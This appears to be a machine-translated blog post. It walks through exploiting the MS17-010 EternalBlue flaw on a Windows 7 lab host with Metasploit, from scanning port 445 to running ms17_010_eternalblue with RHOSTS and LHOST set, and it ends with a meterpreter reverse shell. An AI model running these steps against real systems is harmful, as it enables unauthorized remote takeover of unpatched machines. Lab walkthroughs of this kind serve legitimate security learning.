Eternal Blue Combat - Bug reappears - Moment For Technology

Environment to prepare

Target: 192.168.164.129 (Windows 7)

Vulnerability: MS17-010 (Eternal Blue)

Purpose: To get maximum access to remote code execution

First, determine the target and vulnerability

1. Msfconsole enters MSF mode, then tests whether the target host (192.168.164.129) can be pinged, scans the host using NMAP to open port 445, and then tests whether the vulnerability exists using MSF.

Find the validation module and call it

1. Use the #search MS17-010 command to search for the MS17-010 vulnerability module, as shown in the figure below:

Auxiliary #1 was used to explore the location and see if the vulnerability could be exploited before launching an infiltration attack.

#use auxiliary/scanner/smb/smb_ms17_010  

Copy the code

3. Use the #show options command to view the Required options (Required is yes).

4, set the target address, set the target port;

Set RHOSTS 192.168.164.129 Set RPORT 445Copy the code

5. Finally run the #run or exploit command to check whether the exploit exists

6,Host is likely VULNERABLE to MS17-010!This host has ms17-010 vulnerability, which can be exploited. Adventurous we’ve detected that the target’s OPERATING system is Windows 7 Professional and we can then use the penetration module.

A + sign can attack, can carry out IP range scan

3. Use the Exploist module for penetration

1. The vulnerability was detected in the target in the second step, and now we start to penetrate. Use the #back command to exit the auxiliary module, as shown in the figure below:

2. Use #search MS17-010 to search for module MS17-010, as shown in the figure below:

3. The Auxiliary module was used for vulnerability detection in the second step, and this time the exploit module was used to exploit the vulnerability. Here we choose #2

use exploit/windows/smb/ms17_010_eternalblue

Copy the code

4. Run the #show options command to view the parameters to be set, as shown in the figure below:

Here we see the payload option

6. This option is mainly used for Shell connection established between the target computer and LHOST after successful penetration attack, so LHOST parameter is set to our own local IP address, and RHOSTS parameter is still the target IP address

#set RHOSTS 192.168.164.129   
#set LHOST 192.168.164.128  

Copy the code

Payloads set

7. Finally use the #run command to run the exploit

8. Show meterpreter, we have penetrated successfully, now we have the Shell of the target machine. We can use the #shell command to open a shell on the target machine.

9. Enter shell to enter the shell command interface of the target aircraft; CHCP 65001 (utF8)

Search for the “security Info” public account on wechat

This article uses the article synchronization assistant to synchronize

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Eternal Blue Combat – Bug reappears

Environment to prepare

First, determine the target and vulnerability

Find the validation module and call it

3. Use the Exploist module for penetration

Eternal Blue Combat – Bug reappears

Environment to prepare

First, determine the target and vulnerability

Find the validation module and call it

3. Use the Exploist module for penetration

Related Posts

(LeetCode) brush question record and question comprehension 3.20

Unix and Linux

Game On Serverless: SAE helps Guangzhou Mikey improve the r&d efficiency of micro services